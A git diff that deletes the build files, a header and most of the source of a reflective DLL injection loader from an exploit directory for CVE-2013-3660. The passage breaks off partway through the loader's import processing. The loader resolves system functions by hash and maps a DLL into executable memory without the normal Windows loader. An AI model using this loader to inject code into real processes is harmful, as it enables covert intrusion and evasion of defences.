-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup>
-    <_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
-    <IntDir>$(Configuration)\</IntDir>
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <IntDir>$(Platform)\$(Configuration)\</IntDir>
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
-    <IntDir>$(Configuration)\</IntDir>
-    <LinkIncremental>false</LinkIncremental>
-    <TargetName>exploit</TargetName>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <IntDir>$(Platform)\$(Configuration)\</IntDir>
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <MinimalRebuild>true</MinimalRebuild>
-      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
-      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-      <TargetMachine>MachineX86</TargetMachine>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
-    <ClCompile>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <MinimalRebuild>true</MinimalRebuild>
-      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
-      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <Midl>
-      <TargetEnvironment>X64</TargetEnvironment>
-    </Midl>
-    <ClCompile>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <MinimalRebuild>true</MinimalRebuild>
-      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
-      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-      <TargetMachine>MachineX64</TargetMachine>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <Optimization>MaxSpeed</Optimization>
-      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-      <OptimizeReferences>true</OptimizeReferences>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <TargetMachine>MachineX86</TargetMachine>
-    </Link>
-    <PostBuildEvent>
-      <Command>
-      </Command>
-    </PostBuildEvent>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
-    <ClCompile>
-      <Optimization>MinSpace</Optimization>
-      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-      <BufferSecurityCheck>true</BufferSecurityCheck>
-      <CompileAs>Default</CompileAs>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-      <OptimizeReferences>true</OptimizeReferences>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OutputFile>$(OutDir)$(ProjectName).arm.dll</OutputFile>
-    </Link>
-    <PostBuildEvent>
-      <Command>copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\</Command>
-    </PostBuildEvent>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <Midl>
-      <TargetEnvironment>X64</TargetEnvironment>
-    </Midl>
-    <ClCompile>
-      <Optimization>MaxSpeed</Optimization>
-      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
-      <WholeProgramOptimization>false</WholeProgramOptimization>
-      <PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-      <CompileAs>CompileAsCpp</CompileAs>
-    </ClCompile>
-    <Link>
-      <OutputFile>$(OutDir)$(ProjectName).x64.dll</OutputFile>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-      <OptimizeReferences>true</OptimizeReferences>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <TargetMachine>MachineX64</TargetMachine>
-    </Link>
-    <PostBuildEvent>
-      <Command>copy $(OutDir)$(ProjectName).x64.dll ..\bin\</Command>
-    </PostBuildEvent>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="src\ReflectiveDll.c" />
-    <ClCompile Include="src\ReflectiveLoader.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="src\ComplexPath.h" />
-    <ClInclude Include="src\ReflectiveDLLInjection.h" />
-    <ClInclude Include="src\ReflectiveLoader.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters
deleted file mode 100755
index 15f7cbf646..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters
+++ /dev/null
@@ -1,32 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="src\ReflectiveDll.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="src\ReflectiveLoader.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="src\ReflectiveDLLInjection.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="src\ReflectiveLoader.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="src\ComplexPath.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h
deleted file mode 100755
index 5738497f5b..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h
+++ /dev/null
@@ -1,51 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-
-// we declare some common stuff in here...
-
-#define DLL_QUERY_HMODULE		6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT   __declspec( dllexport ) 
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c
deleted file mode 100755
index 594c0b8066..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c
+++ /dev/null
@@ -1,496 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "ReflectiveLoader.h"
-//===============================================================================================//
-// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
-HINSTANCE hAppInstance = NULL;
-//===============================================================================================//
-#pragma intrinsic( _ReturnAddress )
-// This function can not be inlined by the compiler or we will not get the address we expect. Ideally 
-// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of 
-// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics 
-// available (and no inline asm available under x64).
-__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
-//===============================================================================================//
-
-// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,  
-//         otherwise the DllMain at the end of this file will be used.
-
-// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
-//         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
-
-// This is our position independent reflective DLL loader/injector
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
-#else
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
-#endif
-{
-	// the functions we need
-	LOADLIBRARYA pLoadLibraryA     = NULL;
-	GETPROCADDRESS pGetProcAddress = NULL;
-	VIRTUALALLOC pVirtualAlloc     = NULL;
-	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
-
-	USHORT usCounter;
-
-	// the initial location of this image in memory
-	ULONG_PTR uiLibraryAddress;
-	// the kernels base address and later this images newly loaded base address
-	ULONG_PTR uiBaseAddress;
-
-	// variables for processing the kernels export table
-	ULONG_PTR uiAddressArray;
-	ULONG_PTR uiNameArray;
-	ULONG_PTR uiExportDir;
-	ULONG_PTR uiNameOrdinals;
-	DWORD dwHashValue;
-
-	// variables for loading this image
-	ULONG_PTR uiHeaderValue;
-	ULONG_PTR uiValueA;
-	ULONG_PTR uiValueB;
-	ULONG_PTR uiValueC;
-	ULONG_PTR uiValueD;
-	ULONG_PTR uiValueE;
-
-	// STEP 0: calculate our images current base address
-
-	// we will start searching backwards from our callers return address.
-	uiLibraryAddress = caller();
-
-	// loop through memory backwards searching for our images base address
-	// we dont need SEH style search as we shouldnt generate any access violations with this
-	while( TRUE )
-	{
-		if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
-		{
-			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
-			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
-			if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
-			{
-				uiHeaderValue += uiLibraryAddress;
-				// break if we have found a valid MZ/PE header
-				if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
-					break;
-			}
-		}
-		uiLibraryAddress--;
-	}
-
-	// STEP 1: process the kernels exports for the functions our loader needs...
-
-	// get the Process Enviroment Block
-#ifdef WIN_X64
-	uiBaseAddress = __readgsqword( 0x60 );
-#else
-#ifdef WIN_X86
-	uiBaseAddress = __readfsdword( 0x30 );
-#else WIN_ARM
-	uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
-#endif
-#endif
-
-	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
-	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
-
-	// get the first entry of the InMemoryOrder module list
-	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
-	while( uiValueA )
-	{
-		// get pointer to current modules name (unicode string)
-		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
-		// set bCounter to the length for the loop
-		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
-		// clear uiValueC which will store the hash of the module name
-		uiValueC = 0;
-
-		// compute the hash of the module name...
-		do
-		{
-			uiValueC = ror( (DWORD)uiValueC );
-			// normalize to uppercase if the madule name is in lowercase
-			if( *((BYTE *)uiValueB) >= 'a' )
-				uiValueC += *((BYTE *)uiValueB) - 0x20;
-			else
-				uiValueC += *((BYTE *)uiValueB);
-			uiValueB++;
-		} while( --usCounter );
-
-		// compare the hash with that of kernel32.dll
-		if( (DWORD)uiValueC == KERNEL32DLL_HASH )
-		{
-			// get this modules base address
-			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
-
-			// get the VA of the modules NT Header
-			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
-			// uiNameArray = the address of the modules export directory entry
-			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-			// get the VA of the export directory
-			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
-			// get the VA for the array of name pointers
-			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-			
-			// get the VA for the array of name ordinals
-			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
-			usCounter = 3;
-
-			// loop while we still have imports to find
-			while( usCounter > 0 )
-			{
-				// compute the hash values for this function name
-				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
-				
-				// if we have found a function we want we get its virtual address
-				if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
-				{
-					// get the VA for the array of addresses
-					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
-					// use this functions name ordinal as an index into the array of name pointers
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
-					// store this functions VA
-					if( dwHashValue == LOADLIBRARYA_HASH )
-						pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-					else if( dwHashValue == GETPROCADDRESS_HASH )
-						pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-					else if( dwHashValue == VIRTUALALLOC_HASH )
-						pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-			
-					// decrement our counter
-					usCounter--;
-				}
-
-				// get the next exported function name
-				uiNameArray += sizeof(DWORD);
-
-				// get the next exported function name ordinal
-				uiNameOrdinals += sizeof(WORD);
-			}
-		}
-		else if( (DWORD)uiValueC == NTDLLDLL_HASH )
-		{
-			// get this modules base address
-			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
-
-			// get the VA of the modules NT Header
-			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
-			// uiNameArray = the address of the modules export directory entry
-			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-			// get the VA of the export directory
-			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
-			// get the VA for the array of name pointers
-			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-			
-			// get the VA for the array of name ordinals
-			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
-			usCounter = 1;
-
-			// loop while we still have imports to find
-			while( usCounter > 0 )
-			{
-				// compute the hash values for this function name
-				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
-				
-				// if we have found a function we want we get its virtual address
-				if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
-				{
-					// get the VA for the array of addresses
-					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
-					// use this functions name ordinal as an index into the array of name pointers
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
-					// store this functions VA
-					if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
-						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-
-					// decrement our counter
-					usCounter--;
-				}
-
-				// get the next exported function name
-				uiNameArray += sizeof(DWORD);
-
-				// get the next exported function name ordinal
-				uiNameOrdinals += sizeof(WORD);
-			}
-		}
-
-		// we stop searching when we have found everything we need.
-		if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache )
-			break;
-
-		// get the next entry
-		uiValueA = DEREF( uiValueA );
-	}
-
-	// STEP 2: load our image into a new permanent location in memory...
-
-	// get the VA of the NT Header for the PE to be loaded
-	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
-	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will  
-	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
-	uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
-
-	// we must now copy over the headers
-	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
-	uiValueB = uiLibraryAddress;
-	uiValueC = uiBaseAddress;
-
-	while( uiValueA-- )
-		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
-
-	// STEP 3: load in all of our sections...
-
-	// uiValueA = the VA of the first section
-	uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
-	
-	// itterate through all sections, loading them into memory.
-	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
-	while( uiValueE-- )
-	{
-		// uiValueB is the VA for this section
-		uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
-
-		// uiValueC if the VA for this sections data
-		uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
-
-		// copy the section over
-		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
-
-		while( uiValueD-- )
-			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
-
-		// get the VA of the next section
-		uiValueA += sizeof( IMAGE_SECTION_HEADER );
-	}
-
-	// STEP 4: process our images import table...
-
-	// uiValueB = the address of the import directory
-	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
-	
-	// we assume their is an import table to process
-	// uiValueC is the first entry in the import table
-	uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-	
-	// itterate through all imports
-	while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
-	{
-		// use LoadLibraryA to load the imported module into memory
-		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
-
-		// uiValueD = VA of the OriginalFirstThunk
-		uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
-	
-		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
-		uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
-
-		// itterate through all imported functions, importing by ordinal if no name present
-		while( DEREF(uiValueA) )
-		{
-			// sanity check uiValueD as some compilers only import by FirstThunk
-			if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
-			{
-				// get the VA of the modules NT Header
-				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
-				// uiNameArray = the address of the modules export directory entry
-				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-				// get the VA of the export directory
-				uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
-				// get the VA for the array of addresses
-				uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
-				// use the import ordinal (- export ordinal base) as an index into the array of addresses
-				uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
-
-				// patch in the address for this imported function
